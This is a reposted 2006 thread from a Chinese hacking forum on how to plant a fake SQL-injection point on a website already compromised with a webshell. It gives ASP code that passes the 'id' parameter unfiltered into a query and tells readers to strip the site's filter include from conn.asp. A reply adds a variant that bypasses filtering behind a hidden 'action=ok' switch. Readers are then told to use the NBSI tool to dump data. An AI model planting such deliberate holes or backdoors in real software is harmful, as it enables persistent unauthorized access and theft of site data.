[转载]如何伪造SQL注入点

hack520

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1082
精华: 6
积分: 5597
阅读权限: 150
性别: 男
在线时间: 576 小时
注册时间: 2005-3-18
最后登录: 2008-7-2

发短消息
加为好友
当前离线

楼主大中小发表于 2006-2-14 03:40 只看该作者

[转载]如何伪造SQL注入点

文章作者:pt007
信息来源:幻影旅团

有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:

<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id '如果没有这个admin表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>

然后输入:http://目标IP/a.asp?id=1
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录..

Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。

TOP

xiao2004

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 452
精华: 16
积分: 1740
阅读权限: 100
性别: 男
在线时间: 222 小时
注册时间: 2005-3-19
最后登录: 2008-7-22

发短消息
加为好友
当前离线

沙发大中小发表于 2006-2-18 21:18 只看该作者

不要吧，太老的玩意。
andyower的万网我进来玩过两次，其中尾部就利用了这个，这种东西也要专门开个题出来。

TOP

又一天该用户已被删除	椅子大中小发表于 2006-2-22 03:00 只看该作者提示: 作者被禁止或删除内容自动屏蔽
	TOP

xiao2004

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 452
精华: 16
积分: 1740
阅读权限: 100
性别: 男
在线时间: 222 小时
注册时间: 2005-3-19
最后登录: 2008-7-22

发短消息
加为好友
当前离线

板凳大中小发表于 2006-2-22 10:59 只看该作者

这个倒不会,代码中加点工就可以了

<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
if action=ok then
id = request("id")
else
id=chkstr(request("id"))
end if
strSQL = "select * from admin where id=" & id '如果没有这个admin表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>

chkstr为通用过滤函数,我不记得写了,呵呵,

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]如何伪造SQL注入点